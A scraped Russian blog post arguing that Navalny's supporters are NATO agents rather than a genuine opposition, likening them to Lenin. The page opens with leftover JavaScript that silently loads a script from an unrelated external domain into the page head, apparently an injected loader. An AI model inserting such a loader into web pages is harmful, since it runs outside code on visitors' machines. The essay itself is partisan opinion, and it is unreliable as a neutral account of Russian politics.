, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
RSS
 

Ещё раз про оппозицию

05 Мар

Актуальность данной темы обусловлена тем, что в СМИ, несмотря на судебные решения, продолжаются публикации о Навальном, как о народном герое, увешанном за свои страдания различными премиями.

Экс-президент Польши Лех Валенса в начале февраля выдвинул https://www.znak.com/2021−02−17/pochemu_leh_valensa_vydvinul_navalnogo_na_nobelevskuyu_premiyu_i_chto_dumaet_o_rezhime_putina   российского оппозиционера Алексея Навального на Нобелевскую премию мира.

Существующие понятия «оппозиция», не отражают сути происходящей в России политической борьбы.

Так, считается, что оппози́ция (от лат. oppositio «противопоставление, возражение») в политике — партия или группа, выступающая против господствующей партии или мнения.

Также это политическая деятельность партий, групп и движений, противостоящих правительственному курсу и ведущих с правящей партией (партиями) борьбу за государственную власть в интересах общества.

При этом, нет даже намёка на то, что противостояние и борьба могут осуществляться, игнорируя действующее в стране законодательство, путём активного сопротивления полиции.

Замете, ничего нет, направленного на разрушение государства, захват власти вооружённым путём.

Кроме того, вести политическую деятельность за осуществление государственной власти в интересах общества, сегодня позволяют выборы, наблюдателем на которых может любой гражданин.

Если предложенное оппозиционерами общество одобрит, осуществлять государственную власть станут именно те, кого народ изберёт, чьи предложения по управлению страной окажутся россиянам более привлекательными.

Но именно этого в деятельности называющих себя «оппозиция», мы не наблюдаем.

Сегодня мы наблюдает совсем иное.

Официальный представитель МИД России Мария Захарова полагает https://rg.ru/2021/02/09/zaharova-storonniki-navalnogo-ne-oppoziciia-a-agenty-vliianiia-nato.html   , что сторонники берлинского пациента и сотрудники ФБК* не имеют ничего общего с оппозицией, а являются агентами влияния стран НАТО.

Зачем странам НАТО нужны агенты влияния в России?

Ответ на этот вопрос даёт история нашей страны.

Кто-то пытается в России повторить то, что сделал предатель Отечества, желавший ему поражения в войне с Германией, дворянин Ульянов.

Как известно, Ленин делал ставку на конспирацию и организованный захват власти.

Поэтому он создавал сплочённую группу, живущую на нелегальном положении и профессионально занимающихся революционной борьбой. Её целью было разрушение государства.

При этом он не чурался никаких мер, обеспечивающих ему и его соратникам безбедную жизнь на нелегальном положении, а также иностранной помощи в поражении Отечества.

Он изначально не планировал что-либо создавать. Главное захватить власть.

В итоге Ленин организовал захват власти, заключил позорный Брестский мир с Германией, проигравшей союзникам России Первую мировую войну, а страна на более, чем 70 лет погрузилась в ничем не умеряемое самовластие, которое принесло народу бед больше, чем 300 — летнее правление страной династии Романовых.

Нечто подобное мы наблюдаем и у «называющих себя оппозиция».

Не имея каких-либо предложений по развитию страны, установлению в стране высшей ценностью права и свободы россиян, получая на выборах не более 10% от пришедших на голосование, они бузят о Путине, неоднократно всенародно избранном президенте, как узурпаторе власти.

Бузят и иностранные деятели.

Канцлер Германии Ангела Меркель призвала https://www.rbc.ru/rbcfreenews/600966ef9a7947017b4f1e8e?utm_referrer=https%3A%2F%2Fzen.yandex.com   освободить российского оппозиционера Алексея Навального.

Неужели Меркель желает помочь Путину в установлении в России власти Конституции, обеспеченной её гарантом и правосудием?

Полагаю, что и она осознаёт, что Навальный не годится на роль гаранта Конституции России.

А вот, как в своё время, привезённый в опломбированном вагоне через Германию Ленин, с соратниками, поднять бузу в стране, может. Тем боле, что ещё не все бузотёры, получающие из иностранных источников средства, выявлены.

Поддерживающим такую «оппозицию» россиянам пора осознать, насколько опасны эти люди для многонационального народа России, для развития страны.

* «Фонд борьбы с коррупцией» включен Министерством юстиции РФ в реестр НКО, выполняющих функции иностранного агента.

 
Комментариев нет

Автор: ossin Категория: Прочие заметки

 

Оставить комментарий

Вы должны войти, чтобы оставить комментарий.